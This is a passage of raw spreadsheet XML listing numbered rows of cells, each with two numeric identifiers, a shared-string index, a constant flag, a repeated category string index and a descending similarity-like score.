        <v>0.1912698412698413</v>
      </c>
    </row>
    <row r="13997" ht="15.75" customHeight="1">
      <c r="A13997" s="1">
        <v>227.0</v>
      </c>
      <c r="B13997" s="2">
        <v>1.4717003E7</v>
      </c>
      <c r="C13997" s="2" t="s">
        <v>13475</v>
      </c>
      <c r="D13997" s="2">
        <v>1.0</v>
      </c>
      <c r="E13997" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13997" s="2">
        <v>0.1911976911976912</v>
      </c>
    </row>
    <row r="13998" ht="15.75" customHeight="1">
      <c r="A13998" s="1">
        <v>12937.0</v>
      </c>
      <c r="B13998" s="2">
        <v>3.2361133E7</v>
      </c>
      <c r="C13998" s="2" t="s">
        <v>13476</v>
      </c>
      <c r="D13998" s="2">
        <v>1.0</v>
      </c>
      <c r="E13998" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13998" s="2">
        <v>0.1864686468646864</v>
      </c>
    </row>
    <row r="13999" ht="15.75" customHeight="1">
      <c r="A13999" s="1">
        <v>11158.0</v>
      </c>
      <c r="B13999" s="2">
        <v>1.9480729E7</v>
      </c>
      <c r="C13999" s="2" t="s">
        <v>13477</v>
      </c>
      <c r="D13999" s="2">
        <v>1.0</v>
      </c>
      <c r="E13999" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F13999" s="2">
        <v>0.1861111111111111</v>
      </c>
    </row>
    <row r="14000" ht="15.75" customHeight="1">
      <c r="A14000" s="1">
        <v>15998.0</v>
      </c>
      <c r="B14000" s="2">
        <v>4.4963841E7</v>
      </c>
      <c r="C14000" s="2" t="s">
        <v>13478</v>
      </c>
      <c r="D14000" s="2">
        <v>1.0</v>
      </c>
      <c r="E14000" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14000" s="2">
        <v>0.1838487972508591</v>
      </c>
    </row>
    <row r="14001" ht="15.75" customHeight="1">
      <c r="A14001" s="1">
        <v>10264.0</v>
      </c>
      <c r="B14001" s="2">
        <v>5.7581346E7</v>
      </c>
      <c r="C14001" s="2" t="s">
        <v>13479</v>
      </c>
      <c r="D14001" s="2">
        <v>1.0</v>
      </c>
      <c r="E14001" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14001" s="2">
        <v>0.1831597222222223</v>
      </c>
    </row>
    <row r="14002" ht="15.75" customHeight="1">
      <c r="A14002" s="1">
        <v>13194.0</v>
      </c>
      <c r="B14002" s="2">
        <v>3.4098974E7</v>
      </c>
      <c r="C14002" s="2" t="s">
        <v>13480</v>
      </c>
      <c r="D14002" s="2">
        <v>1.0</v>
      </c>
      <c r="E14002" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14002" s="2">
        <v>0.1831597222222223</v>
      </c>
    </row>
    <row r="14003" ht="15.75" customHeight="1">
      <c r="A14003" s="1">
        <v>7377.0</v>
      </c>
      <c r="B14003" s="2">
        <v>5.104788E7</v>
      </c>
      <c r="C14003" s="2" t="s">
        <v>13481</v>
      </c>
      <c r="D14003" s="2">
        <v>1.0</v>
      </c>
      <c r="E14003" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14003" s="2">
        <v>0.1823161189358373</v>
      </c>
    </row>
    <row r="14004" ht="15.75" customHeight="1">
      <c r="A14004" s="1">
        <v>2581.0</v>
      </c>
      <c r="B14004" s="2">
        <v>3.4299875E7</v>
      </c>
      <c r="C14004" s="2" t="s">
        <v>13482</v>
      </c>
      <c r="D14004" s="2">
        <v>1.0</v>
      </c>
      <c r="E14004" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14004" s="2">
        <v>0.181899641577061</v>
      </c>
    </row>
    <row r="14005" ht="15.75" customHeight="1">
      <c r="A14005" s="1">
        <v>3493.0</v>
      </c>
      <c r="B14005" s="2">
        <v>3.8467156E7</v>
      </c>
      <c r="C14005" s="2" t="s">
        <v>13483</v>
      </c>
      <c r="D14005" s="2">
        <v>1.0</v>
      </c>
      <c r="E14005" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14005" s="2">
        <v>0.181592039800995</v>
      </c>
    </row>
    <row r="14006" ht="15.75" customHeight="1">
      <c r="A14006" s="1">
        <v>20153.0</v>
      </c>
      <c r="B14006" s="2">
        <v>1.0207735E7</v>
      </c>
      <c r="C14006" s="2" t="s">
        <v>13484</v>
      </c>
      <c r="D14006" s="2">
        <v>1.0</v>
      </c>
      <c r="E14006" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14006" s="2">
        <v>0.1813271604938272</v>
      </c>
    </row>
    <row r="14007" ht="15.75" customHeight="1">
      <c r="A14007" s="1">
        <v>9399.0</v>
      </c>
      <c r="B14007" s="2">
        <v>5.5762086E7</v>
      </c>
      <c r="C14007" s="2" t="s">
        <v>13485</v>
      </c>
      <c r="D14007" s="2">
        <v>1.0</v>
      </c>
      <c r="E14007" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14007" s="2">
        <v>0.1811342592592593</v>
      </c>
    </row>
    <row r="14008" ht="15.75" customHeight="1">
      <c r="A14008" s="1">
        <v>8408.0</v>
      </c>
      <c r="B14008" s="2">
        <v>5.3888028E7</v>
      </c>
      <c r="C14008" s="2" t="s">
        <v>13486</v>
      </c>
      <c r="D14008" s="2">
        <v>1.0</v>
      </c>
      <c r="E14008" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14008" s="2">
        <v>0.180930930930931</v>
      </c>
    </row>
    <row r="14009" ht="15.75" customHeight="1">
      <c r="A14009" s="1">
        <v>16514.0</v>
      </c>
      <c r="B14009" s="2">
        <v>4.661876E7</v>
      </c>
      <c r="C14009" s="5" t="s">
        <v>13487</v>
      </c>
      <c r="D14009" s="2">
        <v>1.0</v>
      </c>
      <c r="E14009" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14009" s="2">
        <v>0.1805555555555556</v>
      </c>
    </row>
    <row r="14010" ht="15.75" customHeight="1">
      <c r="A14010" s="1">
        <v>6140.0</v>
      </c>
      <c r="B14010" s="2">
        <v>4.7830262E7</v>
      </c>
      <c r="C14010" s="2" t="s">
        <v>13488</v>
      </c>
      <c r="D14010" s="2">
        <v>1.0</v>
      </c>
      <c r="E14010" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14010" s="2">
        <v>0.17984934086629</v>
      </c>
    </row>
    <row r="14011" ht="15.75" customHeight="1">
      <c r="A14011" s="1">
        <v>34136.0</v>
      </c>
      <c r="B14011" s="2">
        <v>9786570.0</v>
      </c>
      <c r="C14011" s="2" t="s">
        <v>13489</v>
      </c>
      <c r="D14011" s="2">
        <v>1.0</v>
      </c>
      <c r="E14011" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14011" s="2">
        <v>0.1796536796536797</v>
      </c>
    </row>
    <row r="14012" ht="15.75" customHeight="1">
      <c r="A14012" s="1">
        <v>6201.0</v>
      </c>
      <c r="B14012" s="2">
        <v>4.7962555E7</v>
      </c>
      <c r="C14012" s="2" t="s">
        <v>13490</v>
      </c>
      <c r="D14012" s="2">
        <v>1.0</v>
      </c>
      <c r="E14012" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14012" s="2">
        <v>0.1795491143317231</v>
      </c>
    </row>
    <row r="14013" ht="15.75" customHeight="1">
      <c r="A14013" s="1">
        <v>3708.0</v>
      </c>
      <c r="B14013" s="2">
        <v>3.9597982E7</v>
      </c>
      <c r="C14013" s="2" t="s">
        <v>13491</v>
      </c>
      <c r="D14013" s="2">
        <v>1.0</v>
      </c>
      <c r="E14013" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14013" s="2">
        <v>0.179093567251462</v>
      </c>
    </row>
    <row r="14014" ht="15.75" customHeight="1">
      <c r="A14014" s="1">
        <v>5066.0</v>
      </c>
      <c r="B14014" s="2">
        <v>4.4383341E7</v>
      </c>
      <c r="C14014" s="2" t="s">
        <v>13492</v>
      </c>
      <c r="D14014" s="2">
        <v>1.0</v>
      </c>
      <c r="E14014" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14014" s="2">
        <v>0.178921568627451</v>
      </c>
    </row>
    <row r="14015" ht="15.75" customHeight="1">
      <c r="A14015" s="1">
        <v>34.0</v>
      </c>
      <c r="B14015" s="2">
        <v>1.0538861E7</v>
      </c>
      <c r="C14015" s="2" t="s">
        <v>13493</v>
      </c>
      <c r="D14015" s="2">
        <v>1.0</v>
      </c>
      <c r="E14015" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14015" s="2">
        <v>0.1783625730994153</v>
      </c>
    </row>
    <row r="14016" ht="15.75" customHeight="1">
      <c r="A14016" s="1">
        <v>1644.0</v>
      </c>
      <c r="B14016" s="2">
        <v>2.8032631E7</v>
      </c>
      <c r="C14016" s="2" t="s">
        <v>13494</v>
      </c>
      <c r="D14016" s="2">
        <v>1.0</v>
      </c>
      <c r="E14016" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14016" s="2">
        <v>0.1782752902155887</v>
      </c>
    </row>
    <row r="14017" ht="15.75" customHeight="1">
      <c r="A14017" s="1">
        <v>17360.0</v>
      </c>
      <c r="B14017" s="2">
        <v>4.9445046E7</v>
      </c>
      <c r="C14017" s="2" t="s">
        <v>13495</v>
      </c>
      <c r="D14017" s="2">
        <v>1.0</v>
      </c>
      <c r="E14017" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14017" s="2">
        <v>0.177938808373591</v>
      </c>
    </row>
    <row r="14018" ht="15.75" customHeight="1">
      <c r="A14018" s="1">
        <v>27270.0</v>
      </c>
      <c r="B14018" s="2">
        <v>2.1219522E7</v>
      </c>
      <c r="C14018" s="2" t="s">
        <v>13496</v>
      </c>
      <c r="D14018" s="2">
        <v>1.0</v>
      </c>
      <c r="E14018" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14018" s="2">
        <v>0.1772486772486773</v>
      </c>
    </row>
    <row r="14019" ht="15.75" customHeight="1">
      <c r="A14019" s="1">
        <v>12508.0</v>
      </c>
      <c r="B14019" s="2">
        <v>2.9641394E7</v>
      </c>
      <c r="C14019" s="2" t="s">
        <v>13497</v>
      </c>
      <c r="D14019" s="2">
        <v>1.0</v>
      </c>
      <c r="E14019" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14019" s="2">
        <v>0.1768518518518518</v>
      </c>
    </row>
    <row r="14020" ht="15.75" customHeight="1">
      <c r="A14020" s="1">
        <v>6479.0</v>
      </c>
      <c r="B14020" s="2">
        <v>4.8666003E7</v>
      </c>
      <c r="C14020" s="2" t="s">
        <v>13498</v>
      </c>
      <c r="D14020" s="2">
        <v>1.0</v>
      </c>
      <c r="E14020" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14020" s="2">
        <v>0.1766975308641976</v>
      </c>
    </row>
    <row r="14021" ht="15.75" customHeight="1">
      <c r="A14021" s="1">
        <v>15529.0</v>
      </c>
      <c r="B14021" s="2">
        <v>4.3303727E7</v>
      </c>
      <c r="C14021" s="2" t="s">
        <v>13499</v>
      </c>
      <c r="D14021" s="2">
        <v>1.0</v>
      </c>
      <c r="E14021" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14021" s="2">
        <v>0.1757741347905283</v>
      </c>
    </row>
    <row r="14022" ht="15.75" customHeight="1">
      <c r="A14022" s="1">
        <v>33442.0</v>
      </c>
      <c r="B14022" s="2">
        <v>7847468.0</v>
      </c>
      <c r="C14022" s="2" t="s">
        <v>13500</v>
      </c>
      <c r="D14022" s="2">
        <v>1.0</v>
      </c>
      <c r="E14022" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14022" s="2">
        <v>0.1756944444444445</v>
      </c>
    </row>
    <row r="14023" ht="15.75" customHeight="1">
      <c r="A14023" s="1">
        <v>736.0</v>
      </c>
      <c r="B14023" s="2">
        <v>2.0807228E7</v>
      </c>
      <c r="C14023" s="2" t="s">
        <v>13501</v>
      </c>
      <c r="D14023" s="2">
        <v>1.0</v>
      </c>
      <c r="E14023" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14023" s="2">
        <v>0.1752136752136753</v>
      </c>
    </row>
    <row r="14024" ht="15.75" customHeight="1">
      <c r="A14024" s="1">
        <v>15945.0</v>
      </c>
      <c r="B14024" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C14024" s="2" t="s">
        <v>13502</v>
      </c>
      <c r="D14024" s="2">
        <v>1.0</v>
      </c>
      <c r="E14024" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14024" s="2">
        <v>0.1751543209876543</v>
      </c>
    </row>
    <row r="14025" ht="15.75" customHeight="1">
      <c r="A14025" s="1">
        <v>17768.0</v>
      </c>
      <c r="B14025" s="2">
        <v>5.0750549E7</v>
      </c>
      <c r="C14025" s="2" t="s">
        <v>13503</v>
      </c>
      <c r="D14025" s="2">
        <v>1.0</v>
      </c>
      <c r="E14025" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14025" s="2">
        <v>0.1749585406301825</v>
      </c>
    </row>
    <row r="14026" ht="15.75" customHeight="1">
      <c r="A14026" s="1">
        <v>2486.0</v>
      </c>
      <c r="B14026" s="2">
        <v>3.3879377E7</v>
      </c>
      <c r="C14026" s="2" t="s">
        <v>13504</v>
      </c>
      <c r="D14026" s="2">
        <v>1.0</v>
      </c>
      <c r="E14026" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14026" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="14027" ht="15.75" customHeight="1">
      <c r="A14027" s="1">
        <v>30410.0</v>
      </c>
      <c r="B14027" s="2">
        <v>3.8764735E7</v>
      </c>
      <c r="C14027" s="2" t="s">
        <v>13505</v>
      </c>
      <c r="D14027" s="2">
        <v>1.0</v>
      </c>
      <c r="E14027" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14027" s="2">
        <v>0.1744639376218324</v>
      </c>
    </row>
    <row r="14028" ht="15.75" customHeight="1">
      <c r="A14028" s="1">
        <v>7324.0</v>
      </c>
      <c r="B14028" s="2">
        <v>5.0896759E7</v>
      </c>
      <c r="C14028" s="2" t="s">
        <v>13506</v>
      </c>
      <c r="D14028" s="2">
        <v>1.0</v>
      </c>
      <c r="E14028" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14028" s="2">
        <v>0.1742063492063491</v>
      </c>
    </row>
    <row r="14029" ht="15.75" customHeight="1">
      <c r="A14029" s="1">
        <v>6141.0</v>
      </c>
      <c r="B14029" s="2">
        <v>4.7830262E7</v>
      </c>
      <c r="C14029" s="2" t="s">
        <v>13507</v>
      </c>
      <c r="D14029" s="2">
        <v>1.0</v>
      </c>
      <c r="E14029" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14029" s="2">
        <v>0.1739526411657559</v>
      </c>
    </row>
    <row r="14030" ht="15.75" customHeight="1">
      <c r="A14030" s="1">
        <v>778.0</v>
      </c>
      <c r="B14030" s="2">
        <v>2.1113434E7</v>
      </c>
      <c r="C14030" s="2" t="s">
        <v>13508</v>
      </c>
      <c r="D14030" s="2">
        <v>1.0</v>
      </c>
      <c r="E14030" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14030" s="2">
        <v>0.1721311475409836</v>
      </c>
    </row>
    <row r="14031" ht="15.75" customHeight="1">
      <c r="A14031" s="1">
        <v>14414.0</v>
      </c>
      <c r="B14031" s="2">
        <v>3.9233163E7</v>
      </c>
      <c r="C14031" s="2" t="s">
        <v>13509</v>
      </c>
      <c r="D14031" s="2">
        <v>1.0</v>
      </c>
      <c r="E14031" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14031" s="2">
        <v>0.1721230158730158</v>
      </c>
    </row>
    <row r="14032" ht="15.75" customHeight="1">
      <c r="A14032" s="1">
        <v>2857.0</v>
      </c>
      <c r="B14032" s="2">
        <v>3.5525765E7</v>
      </c>
      <c r="C14032" s="2" t="s">
        <v>13510</v>
      </c>
      <c r="D14032" s="2">
        <v>1.0</v>
      </c>
      <c r="E14032" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14032" s="2">
        <v>0.1717948717948718</v>
      </c>
    </row>
    <row r="14033" ht="15.75" customHeight="1">
      <c r="A14033" s="1">
        <v>3552.0</v>
      </c>
      <c r="B14033" s="2">
        <v>3.8779413E7</v>
      </c>
      <c r="C14033" s="2" t="s">
        <v>13511</v>
      </c>
      <c r="D14033" s="2">
        <v>1.0</v>
      </c>
      <c r="E14033" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14033" s="2">
        <v>0.171146953405018</v>
      </c>
    </row>
    <row r="14034" ht="15.75" customHeight="1">
      <c r="A14034" s="1">
        <v>2131.0</v>
      </c>
      <c r="B14034" s="2">
        <v>3.1496861E7</v>
      </c>
      <c r="C14034" s="2" t="s">
        <v>13512</v>
      </c>
      <c r="D14034" s="2">
        <v>1.0</v>
      </c>
      <c r="E14034" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14034" s="2">
        <v>0.1707516339869282</v>
      </c>
    </row>
    <row r="14035" ht="15.75" customHeight="1">
      <c r="A14035" s="1">
        <v>18584.0</v>
      </c>
      <c r="B14035" s="2">
        <v>5.3252515E7</v>
      </c>
      <c r="C14035" s="2" t="s">
        <v>13513</v>
      </c>
      <c r="D14035" s="2">
        <v>1.0</v>
      </c>
      <c r="E14035" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14035" s="2">
        <v>0.1705998033431662</v>
      </c>
    </row>
    <row r="14036" ht="15.75" customHeight="1">
      <c r="A14036" s="1">
        <v>29447.0</v>
      </c>
      <c r="B14036" s="2">
        <v>3.222131E7</v>
      </c>
      <c r="C14036" s="2" t="s">
        <v>13514</v>
      </c>
      <c r="D14036" s="2">
        <v>1.0</v>
      </c>
      <c r="E14036" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14036" s="2">
        <v>0.1703096539162113</v>
      </c>
    </row>
    <row r="14037" ht="15.75" customHeight="1">
      <c r="A14037" s="1">
        <v>19708.0</v>
      </c>
      <c r="B14037" s="2">
        <v>5.6535479E7</v>
      </c>
      <c r="C14037" s="2" t="s">
        <v>13515</v>
      </c>
      <c r="D14037" s="2">
        <v>1.0</v>
      </c>
      <c r="E14037" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14037" s="2">
        <v>0.1701940035273369</v>
      </c>
    </row>
    <row r="14038" ht="15.75" customHeight="1">
      <c r="A14038" s="1">
        <v>28510.0</v>
      </c>
      <c r="B14038" s="2">
        <v>2.6737605E7</v>
      </c>
      <c r="C14038" s="2" t="s">
        <v>13516</v>
      </c>
      <c r="D14038" s="2">
        <v>1.0</v>
      </c>
      <c r="E14038" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14038" s="2">
        <v>0.1700854700854701</v>
      </c>
    </row>
    <row r="14039" ht="15.75" customHeight="1">
      <c r="A14039" s="1">
        <v>13452.0</v>
      </c>
      <c r="B14039" s="2">
        <v>3.5188247E7</v>
      </c>
      <c r="C14039" s="2" t="s">
        <v>13517</v>
      </c>
      <c r="D14039" s="2">
        <v>1.0</v>
      </c>
      <c r="E14039" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14039" s="2">
        <v>0.169983416252073</v>
      </c>
    </row>
    <row r="14040" ht="15.75" customHeight="1">
      <c r="A14040" s="1">
        <v>15113.0</v>
      </c>
      <c r="B14040" s="2">
        <v>4.1852506E7</v>
      </c>
      <c r="C14040" s="2" t="s">
        <v>13518</v>
      </c>
      <c r="D14040" s="2">
        <v>1.0</v>
      </c>
      <c r="E14040" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14040" s="2">
        <v>0.169983416252073</v>
      </c>
    </row>
    <row r="14041" ht="15.75" customHeight="1">
      <c r="A14041" s="1">
        <v>9678.0</v>
      </c>
      <c r="B14041" s="2">
        <v>5.632529E7</v>
      </c>
      <c r="C14041" s="2" t="s">
        <v>13519</v>
      </c>
      <c r="D14041" s="2">
        <v>1.0</v>
      </c>
      <c r="E14041" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14041" s="2">
        <v>0.1693548387096775</v>
      </c>
    </row>
    <row r="14042" ht="15.75" customHeight="1">
      <c r="A14042" s="1">
        <v>12363.0</v>
      </c>
      <c r="B14042" s="2">
        <v>2.8757791E7</v>
      </c>
      <c r="C14042" s="2" t="s">
        <v>13520</v>
      </c>
      <c r="D14042" s="2">
        <v>1.0</v>
      </c>
      <c r="E14042" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14042" s="2">
        <v>0.1685499058380415</v>
      </c>
    </row>
    <row r="14043" ht="15.75" customHeight="1">
      <c r="A14043" s="1">
        <v>28753.0</v>
      </c>
      <c r="B14043" s="2">
        <v>2.8122951E7</v>
      </c>
      <c r="C14043" s="2" t="s">
        <v>13521</v>
      </c>
      <c r="D14043" s="2">
        <v>1.0</v>
      </c>
      <c r="E14043" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14043" s="2">
        <v>0.168488160291439</v>
      </c>
    </row>
    <row r="14044" ht="15.75" customHeight="1">
      <c r="A14044" s="1">
        <v>33572.0</v>
      </c>
      <c r="B14044" s="2">
        <v>8240266.0</v>
      </c>
      <c r="C14044" s="2" t="s">
        <v>13522</v>
      </c>
      <c r="D14044" s="2">
        <v>1.0</v>
      </c>
      <c r="E14044" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14044" s="2">
        <v>0.1684303350970018</v>
      </c>
    </row>
    <row r="14045" ht="15.75" customHeight="1">
      <c r="A14045" s="1">
        <v>30767.0</v>
      </c>
      <c r="B14045" s="2">
        <v>4.4475931E7</v>
      </c>
      <c r="C14045" s="2" t="s">
        <v>13523</v>
      </c>
      <c r="D14045" s="2">
        <v>1.0</v>
      </c>
      <c r="E14045" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14045" s="2">
        <v>0.1683250414593698</v>
      </c>
    </row>
    <row r="14046" ht="15.75" customHeight="1">
      <c r="A14046" s="1">
        <v>13514.0</v>
      </c>
      <c r="B14046" s="2">
        <v>3.5483496E7</v>
      </c>
      <c r="C14046" s="2" t="s">
        <v>13524</v>
      </c>
      <c r="D14046" s="2">
        <v>1.0</v>
      </c>
      <c r="E14046" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14046" s="2">
        <v>0.1682769726247987</v>
      </c>
    </row>
    <row r="14047" ht="15.75" customHeight="1">
      <c r="A14047" s="1">
        <v>25929.0</v>
      </c>
      <c r="B14047" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C14047" s="2" t="s">
        <v>13525</v>
      </c>
      <c r="D14047" s="2">
        <v>1.0</v>
      </c>
      <c r="E14047" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14047" s="2">
        <v>0.1681096681096682</v>
      </c>
    </row>
    <row r="14048" ht="15.75" customHeight="1">
      <c r="A14048" s="1">
        <v>8245.0</v>
      </c>
      <c r="B14048" s="2">
        <v>5.33715E7</v>
      </c>
      <c r="C14048" s="2" t="s">
        <v>13526</v>
      </c>
      <c r="D14048" s="2">
        <v>1.0</v>
      </c>
      <c r="E14048" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14048" s="2">
        <v>0.1675347222222223</v>
      </c>
    </row>
    <row r="14049" ht="15.75" customHeight="1">
      <c r="A14049" s="1">
        <v>11655.0</v>
      </c>
      <c r="B14049" s="2">
        <v>2.3316379E7</v>
      </c>
      <c r="C14049" s="2" t="s">
        <v>13527</v>
      </c>
      <c r="D14049" s="2">
        <v>1.0</v>
      </c>
      <c r="E14049" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14049" s="2">
        <v>0.1674174174174174</v>
      </c>
    </row>
    <row r="14050" ht="15.75" customHeight="1">
      <c r="A14050" s="1">
        <v>8922.0</v>
      </c>
      <c r="B14050" s="2">
        <v>5.4823805E7</v>
      </c>
      <c r="C14050" s="2" t="s">
        <v>13528</v>
      </c>
      <c r="D14050" s="2">
        <v>1.0</v>
      </c>
      <c r="E14050" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14050" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="14051" ht="15.75" customHeight="1">
      <c r="A14051" s="1">
        <v>32071.0</v>
      </c>
      <c r="B14051" s="2">
        <v>5379478.0</v>
      </c>
      <c r="C14051" s="2" t="s">
        <v>13529</v>
      </c>
      <c r="D14051" s="2">
        <v>1.0</v>
      </c>
      <c r="E14051" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14051" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="14052" ht="15.75" customHeight="1">
      <c r="A14052" s="1">
        <v>29030.0</v>
      </c>
      <c r="B14052" s="2">
        <v>3.010397E7</v>
      </c>
      <c r="C14052" s="2" t="s">
        <v>13530</v>
      </c>
      <c r="D14052" s="2">
        <v>1.0</v>
      </c>
      <c r="E14052" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14052" s="2">
        <v>0.1660206718346253</v>
      </c>
    </row>
    <row r="14053" ht="15.75" customHeight="1">
      <c r="A14053" s="1">
        <v>12499.0</v>
      </c>
      <c r="B14053" s="2">
        <v>2.9594294E7</v>
      </c>
      <c r="C14053" s="2" t="s">
        <v>13531</v>
      </c>
      <c r="D14053" s="2">
        <v>1.0</v>
      </c>
      <c r="E14053" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14053" s="2">
        <v>0.1659356725146199</v>
      </c>
    </row>
    <row r="14054" ht="15.75" customHeight="1">
      <c r="A14054" s="1">
        <v>17212.0</v>
      </c>
      <c r="B14054" s="2">
        <v>4.9039231E7</v>
      </c>
      <c r="C14054" s="2" t="s">
        <v>13532</v>
      </c>
      <c r="D14054" s="2">
        <v>1.0</v>
      </c>
      <c r="E14054" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14054" s="2">
        <v>0.1658950617283951</v>
      </c>
    </row>
    <row r="14055" ht="15.75" customHeight="1">
      <c r="A14055" s="1">
        <v>9958.0</v>
      </c>
      <c r="B14055" s="2">
        <v>5.691667E7</v>
      </c>
      <c r="C14055" s="2" t="s">
        <v>13533</v>
      </c>
      <c r="D14055" s="2">
        <v>1.0</v>
      </c>
      <c r="E14055" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14055" s="2">
        <v>0.1650082918739635</v>
      </c>
    </row>
    <row r="14056" ht="15.75" customHeight="1">
      <c r="A14056" s="1">
        <v>26590.0</v>
      </c>
      <c r="B14056" s="2">
        <v>1.7952963E7</v>
      </c>
      <c r="C14056" s="2" t="s">
        <v>13522</v>
      </c>
      <c r="D14056" s="2">
        <v>1.0</v>
      </c>
      <c r="E14056" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14056" s="2">
        <v>0.1649029982363317</v>
      </c>
    </row>
    <row r="14057" ht="15.75" customHeight="1">
      <c r="A14057" s="1">
        <v>11091.0</v>
      </c>
      <c r="B14057" s="2">
        <v>1.8515326E7</v>
      </c>
      <c r="C14057" s="2" t="s">
        <v>13534</v>
      </c>
      <c r="D14057" s="2">
        <v>1.0</v>
      </c>
      <c r="E14057" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14057" s="2">
        <v>0.1643518518518519</v>
      </c>
    </row>
    <row r="14058" ht="15.75" customHeight="1">
      <c r="A14058" s="1">
        <v>18744.0</v>
      </c>
      <c r="B14058" s="2">
        <v>5.3742396E7</v>
      </c>
      <c r="C14058" s="2" t="s">
        <v>13535</v>
      </c>
      <c r="D14058" s="2">
        <v>1.0</v>
      </c>
      <c r="E14058" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14058" s="2">
        <v>0.1643518518518519</v>
      </c>
    </row>
    <row r="14059" ht="15.75" customHeight="1">
      <c r="A14059" s="1">
        <v>10279.0</v>
      </c>
      <c r="B14059" s="2">
        <v>5762466.0</v>
      </c>
      <c r="C14059" s="2" t="s">
        <v>13536</v>
      </c>
      <c r="D14059" s="2">
        <v>1.0</v>
      </c>
      <c r="E14059" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14059" s="2">
        <v>0.1642156862745099</v>
      </c>
    </row>
    <row r="14060" ht="15.75" customHeight="1">
      <c r="A14060" s="1">
        <v>9080.0</v>
      </c>
      <c r="B14060" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C14060" s="2" t="s">
        <v>13537</v>
      </c>
      <c r="D14060" s="2">
        <v>1.0</v>
      </c>
      <c r="E14060" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14060" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="14061" ht="15.75" customHeight="1">
      <c r="A14061" s="1">
        <v>17932.0</v>
      </c>
      <c r="B14061" s="2">
        <v>5.1238157E7</v>
      </c>
      <c r="C14061" s="2" t="s">
        <v>13538</v>
      </c>
      <c r="D14061" s="2">
        <v>1.0</v>
      </c>
      <c r="E14061" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14061" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="14062" ht="15.75" customHeight="1">
      <c r="A14062" s="1">
        <v>26401.0</v>
      </c>
      <c r="B14062" s="2">
        <v>1.7022781E7</v>
      </c>
      <c r="C14062" s="2" t="s">
        <v>13539</v>
      </c>
      <c r="D14062" s="2">
        <v>1.0</v>
      </c>
      <c r="E14062" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14062" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="14063" ht="15.75" customHeight="1">
      <c r="A14063" s="1">
        <v>5336.0</v>
      </c>
      <c r="B14063" s="2">
        <v>4.5326959E7</v>
      </c>
      <c r="C14063" s="2" t="s">
        <v>13540</v>
      </c>
      <c r="D14063" s="2">
        <v>1.0</v>
      </c>
      <c r="E14063" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14063" s="2">
        <v>0.1637931034482759</v>
      </c>
    </row>
